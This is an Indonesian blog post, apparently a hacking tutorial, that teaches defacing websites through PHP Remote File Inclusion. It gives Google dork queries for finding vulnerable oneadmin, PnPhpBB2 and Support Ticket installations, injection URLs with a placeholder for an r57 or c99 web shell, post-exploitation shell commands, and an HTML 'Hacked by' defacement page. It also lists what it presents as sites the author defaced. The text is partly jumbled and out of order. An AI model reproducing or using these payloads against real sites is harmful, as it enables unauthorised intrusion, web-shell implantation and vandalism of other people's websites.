Cara Mudah Deface Remote File Include Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita.. cd namadirectory = Melihat Suatu directory [EvilShellInject] = inject rshell / c99 kamu Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya : Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com - Site Oneadmin RFI Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com Contoh : - PnPhpBB2 Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki… nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject] Contoh : - Support Ticket Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki… Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject] Hehehe Lumayan banyak kan ? Nah selamat mencobanya.. Nah setelah itu buadlah sebuad file: index.html Isi dengan: Kemudian upload deh file ke directorynya kemudian buka website yang telah di deface: Enjoy
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Neh aku kasi beberapa web yang telah berhasil saya Deface..
<html>
Hacked by Nama Kamu
</html>
http://target.com/lokasipathnya/index.html
Free Template Blogger collection template Hot Deals SEO






0 comments:
Post a Comment
Note: Only a member of this blog may post a comment.